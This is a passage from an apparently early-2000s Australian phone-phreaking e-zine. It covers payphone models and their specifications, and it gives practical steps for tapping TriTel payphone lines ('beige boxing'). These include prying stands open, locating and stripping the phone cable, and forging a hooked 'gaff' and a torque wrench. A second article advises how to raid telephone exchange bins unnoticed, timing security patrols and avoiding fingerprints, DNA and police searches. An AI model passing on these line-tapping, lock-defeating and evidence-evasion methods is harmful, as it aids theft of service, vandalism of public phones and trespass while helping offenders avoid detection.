is Telstra did not allow payphone lines to be pre-selected to any other 
carrier during the pre-2000 era. In effect, tens of thousands of L6 and C4 
operators pay full retail rates for each call. In March 2000 Telstra agreed 
to create a new line after consultation with the ACCC, it was to be 
identical to the standard payphone line, minus CLM.

     (6) Payphone Lines vs. Normal Lines: payphones such as the TriTel 
XP1230 utilise a Telephone-style 12 Core cable; whilst the common line you 
will come across in your own home is a Normal, Austel Approved, Telephone 
Cable Flat 4 Core. Depending on the area you are in, the copper wires you 
require for beige boxing are Red and Green or alternatively, White and Blue.

     II. Accessing the Line

     The vast majority of TriTel XP1230's you will come across are encased 
in a stand rather than a booth. In many instances the aperture between the 
stand and the wall it is backed against can vary from a centimeter to an 
inch. If one is able to locate an easily accessible stand with at least one 
inch of space, gently pry it slightly wider and take a peek behind the 
metallic hull. You will notice several chords leading from both the 
mid-section of the payphone and higher up.

     (a) White: the thickest chord (several millimeters short of a 
centimeter in diameter) encased in corrugated white plastic, is the power 
source. Do not cut this line.

     (b) Blue: thickness of a standard pen, this houses the phone line and 
is known as a Telephone-style cable, 12 Core.

     (c) Green-Yellow (striped): several millimeters in diameter, the 
thinnest; this is the insulated Earth copper wire.

     (d) Black: some TriTel payphones I have come across have a black 
telephone cable instead, it is a Flat 6 Core cable and is accessed via a 
hole directly underneath the phone itself but in the actual stand, roughly 
5cm in diameter.

     (e) Grey: this is also an additional line found inconjunction with 
Black 6 Core cables on some TriTel phones and is accessed via the same hole 
as mentioned above. It is understood to be the Flat Earth copper wire in 
some areas.

     If you are able to see the phoneline or ascertain its location, it is 
possible to create a nice hook out of worked silver solder in order to 
"fish" the chord out from behind the stand for beige-boxing. (See Appendix 5 
- Metalwork, Heat Treatment, Tempering to create your own "gaff").

     WARNING. Please make sure you are very certain the line you are about 
to strip is definitely the telephone line. Colours vary in different areas 
as I have illustrated above (See d. and e. for some examples of 
alternatives). A simple, yet effective, method of getting to the copper 
wires underneath the insulation *instead* of stripping the line or slicing 
them length-wise with a knife, is to burn off the plastic with a lighter. I 
*will not* take responsibility for anything you attempt to do based on what 
you have read - you do so at your own risk.

     III. Pricing

     As mentioned earlier, the corporate behemoth, known as Telstra, charges 
full retail rates to all payphone operators who are connected to their 
network. Their payphone division pays an estimated 12 cents per meter pulse, 
(1 meter pulse = 1 local call). Payphone Operators are thus unable to offer 
better rates to the End User due to the method by which they are charged.

     TriTel payphones do not need meter pulses to operate (they are 
Self-Tariffing) and are thus able to pre-select to other carriers, 
theoretically able to offer better rates.

     Due to Telstra's control of the Phonecard market (for alternative 
phonecards see Appendix 1 - PayTel Australia) and their barring of TriTel 
from allowing the XP1230 to read Telstra SmartCards, TriTel has come out 
with their own brand of Phonecards which are available at various Newsagents 
in certain regions of the country, at this writing they are still hard to 
come by.


     Appendix 1 - PayTel Australia
     ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
     Almost half a year ago, whilst researching various exotic payphones 
available around Australia, I came across the PayTel S400 Satellite 
Payphone. Although I have never seen one let alone operated one before, I 
can provide you with quite a detailed amount of information on it (all of 
which I obtained from their website and am essentially presenting here as a 
means of preservation and future reference). If any of you Melbournites ever 
come across any of these, or anyone across Australia for that matter, have a 
good look at them, try various things and email me with some constructive 
information (Do they ring? Do tonediallers work on them? Is the handset 
muted for incoming calls? Are there any barred services and so on).

     PayTel payphones are generally found in a variety of locations and are 
designed for providing remote locations with telephone communication. They 
utilise wireless technology (Analogue / Digital; Cellular Radio, and/or 
Satellite) to provide these services in "mobile environments" or where wire 
connections are not available. They can operate on both credit and 
phonecards - PayTel is the holder of ISO financial card IIN [I]ssuer 
[I]dentification [N]umber 836 600. The phonecards use Magnetic Stripe 
technology encoded with a proprietary data system unique to PayTel. Charges 
for calls Australia-wide and each of 4 ISD call zones are uploaded into each 
S400 by data signalling from the PayTel office (think, Telstra MTMS 
updates).

     Locations where PayTel S400 Satellite Payphones can be found and are 
applied include: Military; Coaches; Outback Tours; Oil Rigs; Trains; 
Freighters; Mining Camps; Roadside Assistance; Isolated Communication; 
Liners; Remote Events and Emergency Locations.

     PayTel is an entirely Australian owned company and claims to be the 
only group providing payphones actually designed and manufactured here.

     Pay·Tel Australia Pty Ltd
     PO Box 456 (4/43 Railway Road)
     Blackburn, Victoria 3130, Australia
     Phone: (03) 9877 0222, Fax: (03) 9877 9499
     Email paytel@melbourne.net

     S400 Satellite Payphone - Overview:

   · 3rd Generation Coinless Payphone (based on Mk II satellite & cellular
     payphones supplied to numerous railway operators across the country)
   · "Flash" Memory - payphone operator can change/set phonecall rates, eg.
     Subsidy $1 p/min
     Cost    $2 p/min
     Profit  $3 p/min
   · Features benefits of chosen CAPSAT telephone (phone/credit card phone)
   · Payphone Diagnostics performed remotely (data signalling from PayTel
     office)
   · Allows for pre-paid phone calls
   · Operates via Thrane & Thrane Capsat telephone as well as "Inmarsat
   · Constructed of strong steel
   · LCD (20 x 2) display: Call Duration & Charging Information
   · Call payment options: credit cards & pre-paid smart cards (phonecards)
   · Payphone Management System provided by PayTel

     Further Specifications & Details:

   · Measurements: 100mm x 300mm x 380mm (depth x h x w)
   · Weight: 5 kg (incl. CAPSAT unit)
   · Power: 200-250v AC / 12v DC.
   · Solar Power (optional)
   · Connection: Voice port & data port, CAPSAT TT-3060, TT-3062A, TT-3062B
   · Fittings: CAPSAT unit can be housed in the payphone or separately
   · Placement: 4 x 5 mm holes at rear for wall mounting
   · Marine protection: Fully cod plated
   · Maintenance: Maintenance free, only requires hygiene cleaning
   · Call payment: Visa, Mastercard, Bankcard or PayTel phonecard
   · Authorisations: Credit Card data sent via modem to PayTel Processing
     Unit
   · Phonecard personalisation (optional at extra charge)
   · Cost of service: 10% credit cards, $6.00 phonecards
   · Call charging: Variable according to owner (1 minute increments)
   · Call cost: As per Telstra standard billing
   · Call information: Duration of call, call cost & remaining call time
     credit displayed on LCD
   · Enviromental resistance: Indoor application only (recommended)
   · Coverage: World-wide Inmarsat coverage according to CAPSAT data
     supplied separately
   · Usage: Graphically indicated on payphone. English language prompts and
     information on LCD
   · Customisation: Call charges, card information and other variables
     according to the owner
   · Cards: Compliant with ISO 7811; PayTel holds IIN 836 600


     Appendix 2 - Siemens Payphones Australia
     ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
     "The company is currently the sole supplier to Telstra of owner
     operated payphones."

              - Siemens

     I. Cityphone Compact

     The Cityphone Compact is a Multi-chipcard & coin payphone. Siemens 
claim that their new phone model is "world leading technology" but has not 
yet been released in Australia at this writing. Quite a sexy phone I might 
add, silver and sleek (uses Abloy keys I see) but has the same handset as 
the Siemens Elasa (better known as the Telstra X2 Smartphone). Since they 
are not yet on the market I am going off what was written at the site 
re-worded in some cases (See Resources & Links).

     (i) Semi-supervised multi-chipcard & coin [Indoor] payphone

   · Line-powered payphone for coins and all kinds of chipcards
   · Integrated security modules
   · S-PMS support & software download
   · Visually & mechanically compatible with TSP/TMI
   · Modular field upgrades from coin to combinations

     (ii) Features

   · 2 wire analogue telephone line interface
   · DTMF & Pulse dialling
   · allows Incoming calls
   · Card change function during call
   · Various Langauge user messages
   · Free to Caller numbers list
   · Barred numbers list
   · Remote charging
   · Self-charging based on polarity reversal (PTT optional)
   · Up to 5 coin escrow Upper compartment electronically controlled

     (iii) Coins

   · Coins escrow
   · Remotely programmable electronic coin validator
   · Escrow capacity: - 4 coin sequential access - 5 coin random access
   · Integrated Coin box (700 cc capacity)
   · External coin box optional (2000 cc capacity)
   · Electromechanical coin entry slide

     (iv) Chipcards

   · Chip cards with or without enhanced security algorithms (e.g. SLE
     4 43X)
   · Electronic purse microprocessor cards

     (v) Security Features

   · Up to four security modules
   · Offline operation
   · Cryptographic authentication between chip card and payphone
   · Reliable store of the charged units
   · Black/white list storage
   · Integrated anti line tampering unit

     (vi) Statistical Data

   · Income (charged quantity)
   · Number of calls
   · Number of invalid telephone cards
   · Management System availability
   · Other requirements

     (vii) Maintenance Features

   · Full diagnostics and tests capabilities
   · Menu driven program for guided field maintenance
   · Displaying of faulty elements, alarms, parameters and statistics
   · Maintenance personnel identification
   · Failure clearance reports

     (viii) Management System

   · Compatible with existing management system (S-PMS)
   · Integrated 2400 bps modem
   · Parameters up- and downloading
   · Software download
   · Download of security access keys

     (ix) Technical Characteristics

   · Process Capacity
     * 16 bits microprocessor
     * 4 Mbits Flash EPROM memory
     * 32 kBytes EEPROM memory
     * 4 Mbits RAM memory
   · Power supply
     * Telephone line powered
   · Communications
     * Integrated 2400 bps modem
   · Keypad
     * CCITT standard numeric keypad.
     * Function keys
     * Hot keys
   · Card reader
     * Conforms to ISO 7816-2
   · Operating environment
     * Temperature range - 20°C to 60°C
   · Display / Instructions plate
     * 2 line LCD display with 2x20 characters

     II. Easyset Entry

     Another payphone soon to be released on the Australian market by 
Siemens is their latest Indoor coin payphone, the Easyset Entry. All 
information included here is either quoted or r-eworded from data supplied 
online from websites found after extensive researching.

     This boy in dark-blue comes with optional Integrated Anti Line 
Tampering security features, which makes for quite an interesting adversary. 
Please note that any of these "not yet released on the market" payphones are 
bound to appear in various locations across the country over the next few 
years, so keep an eye out and keep me posted via email or on the BBS.

     (i) Indoor coin payphone; entry model - Features

   · 2-wire analogue telephone line interface
   · DTMF & pulse dialling
   · allows Incoming calls
   · 4 different languages for user messages
   · Barred numbers
   · Free to Caller numbers
   · Charging pulses (CLM)
   · Self charging with polarity reversal (Push to Talk option)

     (ii) Coins

   · Remotely programmable coin validator
   · Escrow coin storage capacity (2 options):
     * 4 coins escrow in sequential mode
     * 5 coins escrow in random access mode
   · Integrated cash box
   · External coin box (optional)

     (iii) Security Features

   · Reliable collecting scheme
   · Integrated Anti-Line Tampering (optional)
   · Metal Coin Module

     (iv) Statistical Data

   · Amount collected
   · Number of calls
   · Management system access
   · Fast dialling keys
   · Additional statistics can be implemented on request

     (v) Maintenance Features

   · Full diagnostics and test capabilities
   · Menu-driven program for guided field maintenance
   · Display of faulty elements, alarms, parameters and statistics
   · Failure clearing reporting

     (vi) Management System

   · Compatible with existing management system (S-PMS)
   · Modem with 1200 bit/s
   · Up- and downloading of parameters

     (vii) Technical Characteristics

   · Processing Power
     * 8 bit Microprocessor
     * 64 Kbits Flash EPROM
     * 32 kBytes EEPROM
     * 32 Kbits RAM
   · Power Supply
     * Line-powered
   · Communications
     * Integrated 1200 bit/s Modem (V23)
   · Keypad
     * Standard numerical keypad (CCITT/ITU)
     * Function keys
     * Fast dialling keys
   · Operating Range
     * Temperature Range: from 0ºC to +50ºC
   · Display
     * 2 lines LCD display with 24 characters/line.

     III. Telstra Interset 751

     Siemens example of "world leading technology" already available in 
Australia. A No-Coins payphone that deals in the latest generation of chip 
cards. I have not yet seen any of these around but they are said to be 
suited to hotels and hospitals and is obviously the reason why. They look 
like a dark blue Optus housephone with a Bright Red handset and a chip card 
sticking out diagonally on the top right-hand corner. Interestingly, this 
one also has anti line tampering modules.

     (i) Desktop payphone for latest generation chip cards

   · Analogue chip card telephone with integrated anti line tampering
     modules
   · Bundled with hotel application
   · Free flowing data port
   · 12 kHz metering or behind PABX
   · MTMS support & software download
   · Refurbishment option to "as-new" standard for post-Olympic period

     (ii) Features

   · Analogue telephone line interface
   · DTMF & pulse dialing
   · accepts Incoming calls
   · Number redial
   · Change of card during a phone call
   · 4 languages
   · 8 Hot-line keys
   · Storage of barred numbers
   · Storage of non-chargeable telephone numbers
   · Charge pulse evaluation 16 kHz (12 kHz optional)
   · Self tariffing (optional)
   · Data socket

     (iii) Cards

   · Memory cards with algorithm (eg SLE 443X)
   · Microprocessor cards with electronic purses

     (iv) Security Features

   · Up to 3 security modules (eg SLE 44C80)
   · Off-line operation
   · Cryptographic authentication between chip cards and terminal
   · Secure debiting of call charges
   · Reliable storage of charge sums
   · Storage of black/white list for cards
   · Anti line tampering integrated

     (v) Statistical Data

   · Revenue
   · Number of calls
   · Invalid telephone cards
   · Availability of the management system
   · Use of hot-line keys

     (vi) Maintenance Features

   · Full diagnostics and tests capabilities
   · Menu driven program for guided field maintenance
   · Displaying of faulty elements, alarms, parameters and statistics
   · Maintenance personnel identification
   · Failure clearing reporting

     (vii) Management System

   · Compatible with MTMS Management System
   · Modem communication 2400 bit/s
   · Parameter upload/download
   · Software and firmware download
   · Key download to security module

     (viii) Technical specification

   · Processing Power
     * 16 bit microprocessor
     * 4 Mbit Flash EPROM
     * 32 Kbytes EEPROM
     * 4 Mbit RAM
   · Power supply
     * Telephone line powered
   · Communication
     * Integrated modem 2400 bit/s
   · Keypad
     * Numeric keys CCITT standard.
     * function keys
     * Hot line keys
   · Card reader
     * Conforms to ISO 7816-2
   · Operating environment - Temperature range 10ºC to 40ºC
   · Display
     * 2 line LCD display with 2x24 digits

     IV. Diamond (L6 Bluephone)

     Made popular at tens of thousands of locations across Australia, from 
Swimming Pools to Newsagents, Chemists, 7-Eleven and other numerous 
Convenience Stores, Universities, Schools, Pubs, Petrol Stations and a host 
of different "indoor type" locations where these Customer Operated coin-only 
Payphones are in use. Marketted by Telstra as the Bluephone, it has been 
available in Australia since 1988.

     Siemens Communications Pty Ltd
     Cnr. Herring and Talavera Rds
     North Ryde NSW 2113
     Australia
     Mail: Locked Bag No. 2500
     North Ryde NSW 1670
     Phone +61 137 222 Fax +61 1300 360 222

     (i) Features

   · Aluminium diecast casework
   · Fraud resistant (haha)
   · All models suitable for wall or desk mounting
   · Electronic coin validation for 4 different coins
   · Local, long-distance, international, free, barred and operator
     facilities
   · Follow-on Button
   · Decadic (Pulse) / DTMF dialling (payphone identity tone, credit expiry
     tone)
   · Line powered (no mains req.)
   · Self diagnosis of faults
   · Owner mode facility allows operation as a normal phone
   · Hearing aid facility. Fitted with an inductive coupled hearing aid
     adaptor
   · 16-character display
   · Dimensions: 245mm x 180mm x 310mm (w x d x h)
   · Weight: 5 kg
   · Operation Range: 0 to 45 degrees Celsius, 10 to 70% RH
   · CLM - Called subscriber answer indicated by 50Hz / 12kHz meter pulses.
   · Tariff Changing: Pre-set by factory or changed by the owner from the
     keypad
   · Accepts Incoming calls (has loud ring-tone)
   · It is possible to do a 1800-REVERSE call from one Bluephone to another

     (ii) Security

   · Access to the mechanism compartment and cash container is via a single
     keyswitch. A 3rd position on this keyswitch allows use of the
     equipment as an ordinary telephone. Cash container capacity 1 litre.

     (iii) Coin Handling:

   · In-line escrow, capacity 4 coins. Coins are cashed as they are used,
     in the order in which they are inserted. Unused coins are returned.

     V. Elasa (Telstra X1/X2)

     Manufactured in Spain, the Elasa model was originally designed for 
indoor use only but Telstra has utilised it as both an outdoor and indoor 
semi-supervised location Payphone. MTMS updates are constantly barring 
certain numbers that phreakers find and exploit excessively (publicly 
announcing "sensitive" numbers on places such as a BBS is highly frowned 
upon - this was how the iPrimus DCX and FAST were barred). There are 
numerous Workarounds publicised by Zaleth in his article and the Method for 
Un-muting an X2 Smartphone Handset are also included in numerous articles 
and is the reason for why it is not included here.

     This particular subtitle was included to merely record various other 
information about the Elasa payphone as well as a list of currently known 
facts about X2's. The Smartphones are constantly being updated, some are of 
course not and so the differences vary according to location and other 
factors.

     Facts:

     (a) The Ringtone: Yes, it is true that *some* X2 payphones have an 
initial two-tone chime to indicate that there is an incoming call. The vast 
majority *do not* have any sort of ringtone.

     (b) The Un-Mute: Yes, it is possible to un-mute the handset (refer to 
numerous other articles detailing this method).

     (c) Calling other X2's: It is possible to call other X2 payphones from 
an X2 and un-mute the handset for two-way communication. Of course there may 
also exist some X2's that have this capability barred.

     (d) Calling TriTel XP1230's: *Some* X2's are barred from calling TriTel 
payphones.

     (e) Workarounds: Yes, these do work and are necessary if you wish to 
call FAST or the iPrimus DCX.

     (f) Tonediallers: Some X2's will only accept tonedialler DTMF if at 
least 1 digit has been pressed on the actual keypad, others do not accept 
tonediallers at all.

     (g) DTMF Time-delay: Almost all X2 Smartphones have a time-delay 
between pressing the number on the keypad and hearing the actual DTMF being 
played down the line (this only occurs after several digits have been 
pressed). It is possible to find some X2's that are not updated and do not 
have this annoying feature, they simply play the DTMF the moment you press 
the keypad for as many numbers as you dial.

     (h) Straw-trick: This is pathetic, old and does not work any longer. 
The vast majority of payphones will not let you complete the call after 
$1.50 or so has been used up in credit (the line is disconnected and ERROR 
appears on the screen). I'm am quite sure that it isn't even possible now to 
do the straw-trick even for that minimal credit (it's been so long...)

     (i) MTMS: this is dialled up automatically by the phone when an 
excessive amount of unconnected 1800 numbers have been dialled sequentially.


     Appendix 3 - DORO Zircon Payphones
     ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
     The DORO Zircon is an Indoor Coin-Only type Customer Operated payphone 
and can be found in a number of places, particularly Clubs, Restaurants, 
various Shops, Hotels and so on.

     DORO Zircon Specifications:

   · Exterior: White ABS plastic; compact design; ergonomic handset
   · Four memory buttons for fast access to local business
   · Redial; Follow-On; Volume Control; Multilingual selection
   · Accepts 20c, 50c $1 and $2 coins
   · Can be programmed to accept any new coins introduced in the future
   · Raising pip on fifth digit to aid the visually impaired
   · Can be affixed to a wall or desktop mounted
   · Large cashbox capacity
   · Backup battery with five-year life
   · Liquid crystal display (single line)
   · Help-desk coupled with self-diagnostic facility
   · Hearing aid compatible
   · Rather loud ringtone
   · When called, the line connects as soon as the receiving party
     lifts the handset

     DORO Zircon MX Specifications (includes those above)

   · 2mm secure Steel Jacket
   · Secure Cashbox Drawer

     The majority of this information was taken from the following webpage, 
which also includes pictures of these Indoor Coin Payphones:

- http://www.activeelectronics.com.au/doro/doro.html


     Appendix 4 - Vector Technology Corporation (VTC)
     ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
     VECTOR Customer Operated Payphone's (VT-200M) are found in a majority 
of places throughout Sydney, particularly associated with Newsagents, Phone 
stores and other venues in the Chinatown district. They have now spread 
across the entire city and can be found just as easily in the suburbs. Be it 
in secure, semi-secure and outdoor locations, they are in in more than 80 
countries worldwide.

     Vector Technology Corporation
     7F,No.87 Chung-Yang Rd, Sec. 3
     Tuchen Taipei Taiwan
     Tel: (886 2) 22678080 Fax: (886 2) 22678181
     Email:sales@vector.com.tw
     Key Contact: Mr Joe Ran MANAGER

     The payphone itself is slightly larger than the Siemens Diamond model 
(or as it is more commonly known, the Telstra L6 Bluephone). The VTC's found 
commonly in Australia are in dark purple ABS Plastic but Vector Technology 
also release models in Yellow, Green, Brick-Red, Crimson-Red, Cream and so 
on. The dark purple model is known as the VT-200M and are Coin Only (they 
are also designed to accept cards, but I have not come across any with this 
feature activated as yet).

     VT-200M (VTC Coins-Only Payphone) - Specifications:

   · Power: line Power
   · Call Limited: Local, STD, IDD, Internet Gateway Acces - (Minimum
     insertion options)
   · Call Area define: Local 300 sets, STD 300 sets, IDD 400 sets
   · Function Button: Hot line, Barred, Emergency Call.
   · Coin release: Avoids coin channel being blocked.
   · Tariff Rate: Self Tariff, Or System Tariff by Meter Pulsed 12Khz /
     16Khz / 50Hz) - Interfaces with all existing metering signals
     (Tariff Rates programmable)
   · Service Charge, minimum charge.
   · LCD 16 Character - Multipurpose display
   · Coin Definition: Max 12 Kinds - Smart coin collection - Multi-coin
     operations
   · Microprocessor Controlled
   · Electronic coin diameter validator (VT-100); Electronic
     permeability validator (VT-200)
   · Self-diagnostics; Cash Box Monitoring; Coin Jam Release
   · Coin recognition: diameter, Material
   · Tariff  Change: By Keypad / By Remote Control System
   · Income Monitor: By Keypad / By Remote control System
   · Discount Time: 24 Period (Real Time Clock Request)
   · Metal CashBox: default 300Pic, External 2000 Pic
   · Frame: ABS Plastic
   · Desktop / Wall Mouted
   · Access to PABX Systems
   · Size: 245mm x 183mm x 315mm (w x d x h)
   · Weight: 3.5 Kg

     Optional Extras:

   · GSM 900/1800/1900 Mhz Triple Band Module
   · IC Card Option
   · Real Time Clock
   · External Cash Box

     Function List:

     Function 00 - Self-Diagnosis
     Function 01 - Local / STD /IDD block control
     Function 02 - Local/STD/IDD code/rate input
     Function 03 - Tone/Pulse selecting
     Function 04 - Duration for incoming call
     Function 05 - PBX mode setting & Barred code setting
     Function 06 - Warning time setting
     Function 07 - Hot line program (2 sets)
     Function 08 - Accumulation of coins
     Function 09 - Coin recognition program (6 different coins)
     Function 10 - Money or time display & metering Signal selecting
     Function 11 - Owner's password program
     Function 12 - Cashbox monitoring password program
     Function 13 - Language Mode program (2 languages)
     Function 14 - Taxed rate & rate's program for value
     Function 15 - Rate's program for timing
     Function 16 - Data copy program
     Function 17 - Speed dial program (10 sets)
     Function 18 - Auto detection (optional)
     Function 19 - Real Time clock setting (optional)
     Function 20 - Reduce price / periods program
     Function 21 - Carrier Setting (reserve)
     Function 22 - Date off & service program
     Function 23 - Password program
     Function 24 - Simple discount
     Function 25 - 0+ program (optional)
     Function 26 - RMS
     Function 27 - Version no.
     Function 28 - Cashbox / Volume Selecting
     Function 29 - Internet Gateway Access

     VT-200M Additional Information:

     (a) Call cost is generally 50 cents per local call, $1 initial call to 
mobile phones.

     (b) Buttons: Follow On, ReDial, Loud.

     (c) Payphone line: Standard Flat 4 Core Telephone-style cable, [Austel 
Approved].

     (c) 50 cents must be inserted in order to place a 1800 call, the vast 
majority of VTC phones I have come across will actually charge you for 
placing that call - a few simply return the money.

     (d) When attempting to dial a 1800 number without money the first digit 
registers and the DTMF for 1 is played down the line. However, the following 
7 numbers (ie. 800-xxx-x) will not register, after which the phone resets 
and asks again for 50 cents. A mobile phone used as a tone dialler will not 
work, even after one button is pressed on the keypad. The "Follow On & 
ReDial" Workaround pertaining to X2's will not work either since the VTC 
will only register the initial DTMF tone if no money is placed in.

     (e) VTC payphones can be rung and the line is connected as soon as the 
receiving party lifts the handset. The ring-tone is similar to that of the 
L6 Bluephone only slightly higher-pitched and louder in some cases.


     Appendix 5 - Metalwork, Heat Treatment, Tempering
     ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
     I. Silver Solder Gaff

     You can purchase pieces of Silver Solder from Hardware supply stores, 
particularly the larger ones as many of the regular BBC stores in your local 
area may not actually stock any of it (you'd be surprised). Silver solder is 
quite literally, solder containing silver - and is a long piece of solder 
about 3 millimeters in diameter and usually found about a metre long. It is 
easily recognisable in a brown or shiny grey-brown colour and much more 
stiffer than flimsy wire coat-hangers or other similar pieces.

     A gaff, by definition, is a device for hooking fish; but in the 
phreaking sense I apply my miniaturised-gaff device to "fishing" phonelines 
out from the back of payphones, particularly the TriTel XP1230's as they are 
accessible this way (the stands are sometimes an inch off the wall). Since 
pieces of silver solder can be quite long it is effective; an accomplice can 
stand beside you and hold the gaff in place while you have access to the 
line and do what you will.

   · Using a strong and larger pair of pincers bend the silver solder at a 
point no more than a few inches from one side (as you do not want to lose 
too much of its overall length). It may take some effort in straightening 
and bending (sometimes a hammer can assist in getting it to the right angle) 
so that two halves are parallel with one another and there is roughly 1 cm 
of gap between them (this provides the perfect hook shape at the bend).
   · With the same pair of pincers clip off the shorter half right at the 
point where the bending stops. Make sure that any sharp edges are smoothed. 
Keep the long section as straight as possible since it can be quite 
frustrating attempting to fish for phonelines with a crooked gaff.
        ____________________________________________________
        ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯)
                                                           ¯
   · A pathetic ASCII drawing is provided here for my amusement and also 
your own. Enjoy. NB. this picture is *greatly* reduced in size.

     II. Lock Picks

     While this topic is not entirely related to anything else in the 
article, it was put in firstly as a prelude to a future article covering 
this area; and secondly since the methods for tempering and manipulating 
metals applies to both the construction of gaffs and picks. I will attempt 
to apply the metal treatments for lockpicks to making a perfect gaff (for 
the obsessed).

     Constructing a strong torque wrench is done by choosing a nail that 
suits the various locks you have been studying. Nails which are roughly .25 
cm in diameter, once turned into a torque wrench, suit a majority of locks 
you may come across. Please note that some Lock Picking articles online 
refer to the "torque" wrench as a tension wrench. Utilising a propane torch 
to heat up the nail is ideal, once it glows red gradually remove it from the 
flame and allow the air to cool it down - this basically softens the metal. 
You can apply this to the silver solder for making your gaff.

   · At the point at which you intend on bending the silver solder for 
producing the "hook" tip apply a propane torch flame (or gas stove flame if 
possible) to the area until it turns red as one does when preparing the 
torque wrench. Once the silver solder has cooled in the air it is soft and 
easily manipulable.
   · Bend the silver solder at the softened point so that two halves are 
parallel with one another and there is roughly 1 cm of gap between them 
(exactly as you would in the I. Silver Solder Gaff description).
   · With a strong pair of pincers cut off the shorter half right at the 
point where the bending stops (exactly as you would using the more crude 
method of gaff construction detailed in I. Silver Solder Gaff above).
   · To harden the hook, now that it has been neatly bent and excess silver 
solder cut off, you will have to temper it by heating the hook end with the 
propane torch or gas stove flame till it is bright orange. Once it has 
reached this state immerse the heated portion in a bucket of ice water. You 
will end up with one of the strongest and finest constructed Silver Solder 
Gaffs around.
   · NB. Make sure that the hook-tip is not too sharp, grind it smooth or 
flatten it and file down the edges manually (you dont want to be "fishing" a 
line to see if it is the power source or phone cable and end up peircing the 
insulation!).


     Resources & Links
     ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
     Some of the information included in here was obviously obtained from 
online sources that I personally researched and has been mainly paraphrased, 
re-written in comprehensive terms to partially quoted. These pertain to the 
payphones that I was not able to get physical access to (particularly the 
PayTel S400 and the four new Siemens payphones).

* Siemens
http://www.siemens.com.au/sections/p_s/ic/ic_payphones/ic_payphones.html

* Pay·Tel Australia
http://www.paytel.com.au/

* DORO Zircon
http://www.activeelectronics.com.au/doro/doro.html

* Vector Technology Corporation
http://www.vector.com.tw/profile.htm
http://showcase.cetra.org.tw/comdex/search/search.asp?midclass=2230&page=11
http://showcase.cetra.org.tw/comdex/search/company.asp?ban=84514030&prodseq=14844&SchClause=midclass%3D2230%26page%3D11

* TrendTek Australia
http://www.trendtek.com.au/

* Protel International
http://WWW.PROTELINC.COM/PROTELInt/INDEX.HTM

     Perhaps this will serve to show neophytes entering the scene and 
wondering how they can start learning more, that the value of research is 
immeasurable. It may take hours, even days before you find what you are 
looking for, but the rewards far exceed the cost. The most useful search 
engine of them all in my own opinion is the wondrous http://www.google.com/

                          -=-=-=-=-=-=-=-=-=

     Until next time, Addio miei amici. I hope you enjoyed the article and 
found it as helpful as it was informative. Positive feedback is always 
appreciated.

     ~pHreakazØid~

                          -=-=-=-=-=-=-=-=-=

     >eof<



.::::::.[07] Paranoia & Being Paranoid Pt.1 ::::::::::::::::::. [head_rush]


:: What It Means

par·a·noi·a
n. 
1) A psychotic disorder characterized by delusions of persecution with or without grandeur, often strenuously defended with apparent logic and reason. 
2) Extreme, irrational distrust of others

par·a·noid
adj. 
1) Relating to, characteristic of, or affected with paranoia. 
2) Exhibiting or characterized by extreme and irrational fear or distrust of others: a paranoid suspicion that the phone might be bugged. 

n. 
One affected with paranoia.

Being paranoid to me just means being smart, wising up, not being stupid and giving out unneccasry information or bragging about shit. Nowadays there are so many ways that you can be traced, information gathered about you and the like. While most this happens while being online, most, if not all phreakers come online for resources, discussion, study or just general browsing. This is where everybody is most vulnerable.

:: Paranoia In The Field/ Off Line

This is probably the most dangerous area, especially if you are into trashing, where you can be caught in a rubbish bin with pieces of paper in your hand. Scanning is also another place where people can get suspicous, why would a person need to stand in a phone booth, dialing number, writing something down, then dialing again, just doesn't make sense.

.: Trashing :.

This isn't going to tell you how to trash, rather tell you safer methods of doing so. What you wear is very important, don't wear all black because:
a)you look like a goth and they suck and 
b) it does look a bit to suspicous, but then again don't dress in cricket whites because they are easy to spot. Wear darkish coloured clothes- browns(does anybody wear that colour), navy blues, dark blues and the like.

Caseing out the place that you are going to trash does take more time, but it could help you from getting caught in the end. Pick an exchange that is a close travelling distance from your house, but not right near it, make sure it is away from bacon station's. I know of one exchange, where my shack is located where the pig station is right next door to the exchange. When caseing out the exchange have a look if the bin has a lock on it or not, this might save you having to bring tools along. If the exchange has a park, or something similar hang around there, and pull 13/f/jap on the little kids... I mean watch the exchange to see if there are any passing patrols or rent a cops that go past. If so note these times, and make sure you come back to trash in between these times.

When you have decided on a time, its time to pack up and get ready to go. Try and take as little tools as possible, if you know there is no lock, don't take a lock picking set. If there is a lock, try lock picking techniques on it, as cutting the lock is suspicous and they will wise up to what is happening. Take a pair of gloves, like the densists/docotrs use, or what some people use to serve food(This is a document about being paranoid right.) If the cops do get called in they will most probably fingerprint, if you are way way paranoid, wear a hat or something to stop hair falling out, this would help to minimise chances of DNA testing(also watch out for sweat, skin, anythig like that). I read somewhere about wearing a pair of shorts underneath your pants and putting the gloves in there, so that even if you are patted down then they feel like part of the material. If you do need to take tools hide them as well as possible, lock picks in the bottom of a backpack under a flap, or a set of books or something similar, where they will most likely be missed in a search. A torch, or felt pen is a good place to hide small equipment inside, the torch then can be used to help search for stuff in the bin(carry "spare" batteries somewhere else).

